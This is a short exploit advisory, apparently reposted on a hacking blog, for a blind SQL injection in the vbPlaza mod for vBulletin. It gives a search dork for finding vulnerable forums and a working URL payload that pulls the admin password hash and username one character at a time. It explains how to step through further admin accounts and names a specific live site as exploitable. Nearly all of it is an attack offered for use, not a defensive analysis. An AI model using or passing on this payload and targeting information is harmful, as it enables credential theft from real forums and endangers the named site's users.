_vBulletin vbBux-vbPlaza <= 2.x (vbplaza.php) Blind SQL Injection Vuln

--==+======================================================================================================================+==----==+ vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability +==----==+======================================================================================================================+==--
AUTHOR: Cold z3ro & Crck_ManSITE: www.vbPlaza.comDORK: inurl:"vbplaza.php?do=*"
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
EXPLOIT: http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
IE: ascii encodes58 => :48 => 0120 => x
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .
bantot.net <--- u can exploit

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking
 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger